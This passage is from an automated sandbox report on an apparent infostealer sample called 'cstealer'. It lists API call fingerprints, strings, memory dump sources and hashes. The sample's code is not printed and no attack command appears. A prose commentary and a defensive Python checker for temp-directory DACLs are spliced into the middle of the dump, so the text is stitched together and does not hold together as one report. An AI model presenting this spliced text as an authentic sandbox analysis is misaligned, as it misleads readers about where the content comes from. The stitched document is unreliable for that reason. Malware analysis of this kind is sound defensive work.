                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction ID: f2252d25c2253d9cc9e163ee02ffa033e2dfd6b0cd0a6ec1ee66d054176521c2
                                                                                                                                                            • Opcode Fuzzy Hash: 56c47cfc8464f7969a639e7ce3d60490623cf8b9b00151c5924cedcf2ef07519
                                                                                                                                                            • Instruction Fuzzy Hash: E0118E22A19A6186E3609B22E948369B6E4FB88FE4F004275EE5DC7794CF3CD944CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
                                                                                                                                                            • String ID: CONOUT$
                                                                                                                                                            • API String ID: 3230265001-3130406586
                                                                                                                                                            • Opcode ID: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction ID: f414edc7c93a8aa176a3530a7a88ddceb36b409f4f61e8155d53db159c5bb2e6
                                                                                                                                                            • Opcode Fuzzy Hash: ea8503a65e9befc0d33d9332805196394b6329e0df61646a9863ad39bb9ae76f
                                                                                                                                                            • Instruction Fuzzy Hash: 1211B271319B408AE7608F9AE84835A72A0FF88FE4F540625EB5E877D4CF7CC4248B44
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Heap$Process$AllocFree
                                                                                                                                                            • String ID: dialer
                                                                                                                                                            • API String ID: 756756679-3528709123
                                                                                                                                                            • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction ID: cada6fe809ee421c00d7dbdea2850f4131d446d43a7e9574e8ec3edb93246afd
                                                                                                                                                            • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                                                                                                            • Instruction Fuzzy Hash: F331703270AB51CAEA25DF9AA54876A67A0FF44B84F084D219F4C47B95FF38C4718B00
                                                                                                                                                            APIs
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetCurrentProcess.KERNEL32 ref: 00007FF6957E8880
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: OpenProcessToken.ADVAPI32 ref: 00007FF6957E8891
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetTokenInformation.ADVAPI32 ref: 00007FF6957E88B6
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetLastError.KERNEL32 ref: 00007FF6957E88C0
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: GetTokenInformation.ADVAPI32 ref: 00007FF6957E8900
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: ConvertSidToStringSidW.ADVAPI32 ref: 00007FF6957E891C
                                                                                                                                                              • Part of subcall function 00007FF6957E8860: CloseHandle.KERNEL32 ref: 00007FF6957E8934
                                                                                                                                                            • LocalFree.KERNEL32(00000000,00007FF6957E3B4E), ref: 00007FF6957E8C0C
                                                                                                                                                            • LocalFree.KERNEL32 ref: 00007FF6957E8C15
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Token$FreeInformationLocalProcess$CloseConvertCurrentErrorHandleLastOpenString
                                                                                                                                                            • String ID: D:(A;;FA;;;%s)$D:(A;;FA;;;%s)(A;;FA;;;%s)$S-1-3-4$Security descriptor string length exceeds PATH_MAX!
                                                                                                                                                            • API String ID: 6828938-1817031585
                                                                                                                                                            • Opcode ID: 8ff8ea2c17bd8fbf586603b6c91de9233eb7c00b5d3dcbaf8731662f4bda8ceb
                                                                                                                                                            • Instruction ID: 5e08b2edcd7b90b3106e641931fa41e3af83a12e6153d8690d6c0342483dc922
                                                                                                                                                            • Opcode Fuzzy Hash: 8ff8ea2c17bd8fbf586603b6c91de9233eb7c00b5d3dcbaf8731662f4bda8ceb
                                                                                                                                                            • Instruction Fuzzy Hash: 2C213021A1974681F630AB20F9056FA62A4FF48B80F8405B2E95DD76A6DF3CEE498740
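The Token entry above fingerprints a routine that formats an SDDL DACL from the current user's SID, optionally adds the well-known OWNER_RIGHTS SID S-1-3-4, and fails with "Security descriptor string length exceeds PATH_MAX!" when the result is too long; this matches the temp-directory hardening in the PyInstaller bootloader (the report flags PyInstaller elsewhere), although that attribution is my inference, not something the listing states. The following is an added example, not code from the report or from the sample: a pure-Python model of that step that builds the descriptor string, parses it back into ACEs, and checks that only the user and OWNER_RIGHTS receive full access. The function names, the constructed user SID and the 260-character PATH_MAX limit are assumptions.

```python
import re

PATH_MAX = 260               # assumed Windows MAX_PATH (the limit named in the error string)
OWNER_RIGHTS_SID = "S-1-3-4"  # well-known OWNER_RIGHTS SID present in the string set above

SID_RE = re.compile(r"^S-1-\d+(-\d+)+$")
# SDDL ACE layout: (type;flags;rights;object_guid;inherit_object_guid;account_sid)
ACE_RE = re.compile(
    r"\((?P<type>[A-Z]+);(?P<flags>[^;]*);(?P<rights>[^;]*);"
    r"(?P<obj>[^;]*);(?P<inh>[^;]*);(?P<sid>[^)]+)\)"
)


def build_temp_dir_sddl(user_sid: str, with_owner_rights: bool = True) -> str:
    """Format the DACL the fingerprinted routine builds: full access (FA) for the
    caller's SID and, optionally, for OWNER_RIGHTS. Raises when the string would
    not fit a PATH_MAX buffer, mirroring the 'exceeds PATH_MAX!' failure path."""
    if not SID_RE.match(user_sid):
        raise ValueError(f"not a SID string: {user_sid!r}")
    if with_owner_rights:
        sddl = "D:(A;;FA;;;%s)(A;;FA;;;%s)" % (user_sid, OWNER_RIGHTS_SID)
    else:
        sddl = "D:(A;;FA;;;%s)" % user_sid
    if len(sddl) >= PATH_MAX:
        raise ValueError("Security descriptor string length exceeds PATH_MAX!")
    return sddl


def parse_dacl(sddl: str) -> list:
    """Split a DACL-only SDDL string ('D:' followed by ACEs) into ACE dicts.
    Rejects trailing or malformed characters so a partial parse cannot pass."""
    if not sddl.startswith("D:"):
        raise ValueError("expected a DACL-only SDDL string")
    body = sddl[2:]
    matches = list(ACE_RE.finditer(body))
    if sum(len(m.group(0)) for m in matches) != len(body):
        raise ValueError("unparsed characters in DACL")
    return [m.groupdict() for m in matches]


def dacl_is_user_private(sddl: str, user_sid: str) -> bool:
    """True when every ACE is an allow-full-access ACE for the user or for
    OWNER_RIGHTS, i.e. no other principal (Everyone S-1-1-0, Users
    S-1-5-32-545, ...) is granted anything on the directory."""
    allowed = {user_sid, OWNER_RIGHTS_SID}
    aces = parse_dacl(sddl)
    if not aces:
        return False  # an empty DACL grants access to nobody, but is not the expected shape
    return all(
        a["type"] == "A" and a["rights"] == "FA" and a["sid"] in allowed
        for a in aces
    )


if __name__ == "__main__":
    # Constructed user SID for the demo; a real one comes from GetTokenInformation(TokenUser).
    demo_sid = "S-1-5-21-1111111111-2222222222-3333333333-1001"
    sddl = build_temp_dir_sddl(demo_sid)
    print(sddl, dacl_is_user_private(sddl, demo_sid))
    print(dacl_is_user_private("D:(A;;FA;;;S-1-1-0)", demo_sid))
```

The checker is the part worth keeping: run it against the SDDL of a suspicious `_MEI*` extraction directory (for example from `Get-Acl -Path <dir> | Select-Object -ExpandProperty Sddl` on the host) to confirm whether the payload directory is really restricted to the launching user or has been left world-writable.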
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC087
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0BD
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0EA
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC0FB
                                                                                                                                                            • FlsSetValue.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC10C
                                                                                                                                                            • SetLastError.KERNEL32(?,?,?,00007FF6957F5CBD,?,?,?,?,00007FF6957FF9AF,?,?,00000000,00007FF6957FC196,?,?,?), ref: 00007FF6957FC127
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                             • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 1d6d34f25b4e15651fb5ef4073e48a7136f047fe8116dc42d62c874e1d236ac0
                                                                                                                                                            • Instruction ID: 70414ad8d0152a2891e433afea7a66586c2445323826c03dfb478e243659893a
                                                                                                                                                            • Opcode Fuzzy Hash: 1d6d34f25b4e15651fb5ef4073e48a7136f047fe8116dc42d62c874e1d236ac0
                                                                                                                                                            • Instruction Fuzzy Hash: 3D114C20A0C65242FA75E735AA551B962E6DF44FB0F2407B5DC3ECB6C6DE2CBD416700
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Value$ErrorLast
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2506987500-0
                                                                                                                                                            • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction ID: d63e8eb92f78b0245f8f091d6f6e52048156055828fe7815b4d97f37a9b45724
                                                                                                                                                            • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                                                                                                            • Instruction Fuzzy Hash: F5116D3020F24059FE749FBD954D76922426F587E0F240F24A82E47BDAEE6884618E00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 517849248-0
                                                                                                                                                            • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction ID: a82bddac9bbc9b9158c41d4779d08d51c46df858f8042d16c73f8c9134f22247
                                                                                                                                                            • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                                                                                                            • Instruction Fuzzy Hash: FE015B71309A408AEA20DF9AA44C75A63A1FF88BC4F884835DF8D43B95DF3CC559CB40
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 449555515-0
                                                                                                                                                            • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction ID: 1d0aed8402332d8e645e6f83485db47a1002e82c96cf3d3817b2469c997b30c0
                                                                                                                                                            • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                                                                                                            • Instruction Fuzzy Hash: 98011BB521BB408AEF349FA9E80C75663A0BF45B86F540C25CA4D077A5EF3DC1688B04
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                                                                                                            • String ID: csm$f
                                                                                                                                                            • API String ID: 2395640692-629598281
                                                                                                                                                            • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction ID: c55a1298613c4be96f3041dda599e24fdbd12fe273f718f4fd4c77ac03c01cb4
                                                                                                                                                            • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                                                                                                            • Instruction Fuzzy Hash: A151A03261A6008EEF24CF59E84CB5937E5FB44B98F508D24DA0A47BCCEB35C862CB00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2714325177.00007FF8A48F1000.00000020.00000001.01000000.00000019.sdmp, Offset: 00007FF8A48F0000, based on PE: true
                                                                                                                                                             • Associated: 00000003.00000002.2714275886.00007FF8A48F0000.00000002.00000001.01000000.00000019.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff8a48f0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: new[]
                                                                                                                                                            • String ID: :$:$?$\
                                                                                                                                                            • API String ID: 4059295235-1971430616
                                                                                                                                                            • Opcode ID: a64556b63462c90a227d4e7cefc6a6e4c5cb8f667e262823cc78d299466ad490
                                                                                                                                                            • Instruction ID: 0759226cef92bfa4a3a537bf92e830507ac79033d7ef90b13f3c91d30c234311
                                                                                                                                                            • Opcode Fuzzy Hash: a64556b63462c90a227d4e7cefc6a6e4c5cb8f667e262823cc78d299466ad490
                                                                                                                                                            • Instruction Fuzzy Hash: 0E510216F0F682A5FF559BA1B4816BA6791EF84BC8F484072DE4E076B6DFBCE4458300
                                                                                                                                                            APIs
                                                                                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00007FF6957E8AF2,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E29F4
                                                                                                                                                              • Part of subcall function 00007FF6957E8770: GetLastError.KERNEL32(00000000,00007FF6957E2A3E,?,?,?,?,?,?,?,?,?,?,?,00007FF6957E101D), ref: 00007FF6957E8797
                                                                                                                                                              • Part of subcall function 00007FF6957E8770: FormatMessageW.KERNEL32 ref: 00007FF6957E87C6
                                                                                                                                                              • Part of subcall function 00007FF6957E8DE0: MultiByteToWideChar.KERNEL32(?,?,?,?,?,00007FF6957E2A9B), ref: 00007FF6957E8E1A
                                                                                                                                                            • MessageBoxW.USER32 ref: 00007FF6957E2AD0
                                                                                                                                                            • MessageBoxA.USER32 ref: 00007FF6957E2AEC
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                             • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: Message$ErrorLast$ByteCharFormatMultiWide
                                                                                                                                                            • String ID: %s%s: %s$Fatal error detected
                                                                                                                                                            • API String ID: 2806210788-2410924014
                                                                                                                                                            • Opcode ID: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction ID: a9103afe176f52cbe78642f2056b20853b8e02445d4f0fec172ea73681d362ef
                                                                                                                                                            • Opcode Fuzzy Hash: e540fe95cbcf3c4f9a9ac735379b1c9e9ae60ded60aea03e9d716fb219e4d584
                                                                                                                                                            • Instruction Fuzzy Hash: 5331667262979191E730DB20E4515EAA3A4FF84BC4F404176E68D96AA9DF3CDB09CB40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: FinalHandleNamePathlstrlen
                                                                                                                                                            • String ID: \\?\
                                                                                                                                                            • API String ID: 2719912262-4282027825
                                                                                                                                                            • Opcode ID: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction ID: 522e71180f65c9dca4a0cd9855eca99b926e46b1579d6b756a01c457d0a65163
                                                                                                                                                            • Opcode Fuzzy Hash: c1daab9146f2a1614ef605d22fd4f721266e20aa8a0235322e79b2424596649d
                                                                                                                                                            • Instruction Fuzzy Hash: 84F031B230964196EB708FA9E98875A6760FF48B88FD44421DB4D46B94DB3CC65DCF00
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                             • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                                                             • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction ID: c45e75ad2a6c0e8528d3e46f2eddc9b3752a03e735f3178137c1fe1a5ee646ba
                                                                                                                                                            • Opcode Fuzzy Hash: 2230a043baf354bfbc53885d3c0454218b923bdff90d2529a0827c645eda448d
                                                                                                                                                            • Instruction Fuzzy Hash: 5CF0F621B0AA0281FF348F24E44877963A0FF49F60F540276DA6E892F0CF2CE949C300
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                            • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                            • API String ID: 4061214504-1276376045
                                                                                                                                                            • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction ID: 3fde1b4acaf1c2a7621f6aadb595f1a0520da6d3fe647dd13f331d96860d9654
                                                                                                                                                            • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                                                                                                            • Instruction Fuzzy Hash: C7F062B121A70489EF308FACE44C35A6360EF84765F940A19DB6E457E4DF2CC5648F40
                                                                                                                                                            APIs
                                                                                                                                                            Strings
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CombinePath
                                                                                                                                                            • String ID: \\.\pipe\
                                                                                                                                                            • API String ID: 3422762182-91387939
                                                                                                                                                            • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction ID: 385cd6917ef0efa851a74bdb6abc75743dac0bf1ef5c84b8943756caa081a227
                                                                                                                                                            • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                                                                                                            • Instruction Fuzzy Hash: 79F082B430DB8086EA208FDBB90C11A6260AF48FC0F445930EF4E07B98DF3CC4658B00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: CurrentThread
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 2882836952-0
                                                                                                                                                            • Opcode ID: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction ID: 92d5dd4e415f69041205096e8f11b788bf74372da79bb5bae543fcfe5fde79cf
                                                                                                                                                            • Opcode Fuzzy Hash: 0c7f3a11ae4e5ff47235e902b7b6ce7055ed727b420134bb2449cab27e882fd8
                                                                                                                                                            • Instruction Fuzzy Hash: 8B61AC3651EB84CAEA70CF99E44835AB7A0F788794F100955EA8D47FA8EB7CC561CF04
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2712890386.00007FF6957E1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF6957E0000, based on PE: true
                                                                                                                                                            • Associated: 00000003.00000002.2712403991.00007FF6957E0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2713739511.00007FF69580C000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF69581F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714015154.00007FF695821000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            • Associated: 00000003.00000002.2714156210.00007FF695823000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_7ff6957e0000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction ID: 9786c896effd60b735d74fef3d11193670847d29339bb0b6f525b0c2330a6263
                                                                                                                                                            • Opcode Fuzzy Hash: a62d4fcbb0970871e45180a1f834c32a3c4d190302dd8db61346826940fa499d
                                                                                                                                                            • Instruction Fuzzy Hash: F011942AE1DE2323F6F41174E75A3F925C1EF65B70E1446B7E56E862D78E2C6C404304
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
                                                                                                                                                            • Source File: 00000003.00000002.2711339446.00000271DC670000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000271DC670000, based on PE: true
                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                            • Snapshot File: hcaresult_3_2_271dc670000_cstealer.jbxd
                                                                                                                                                            Similarity
                                                                                                                                                            • API ID: _set_statfp
                                                                                                                                                            • String ID:
                                                                                                                                                            • API String ID: 1156100317-0
                                                                                                                                                            • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction ID: f892ab0a3f87b1ab50160ce5fee09d79b182faa922a6a9fc94291013d711edb4
                                                                                                                                                            • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                                                                                                            • Instruction Fuzzy Hash: B31191F2A5EA5019F6741DECD47D3771150EF6C3B8F480E24AABE06BD68A2CC8616A00
                                                                                                                                                            APIs
                                                                                                                                                            Memory Dump Source
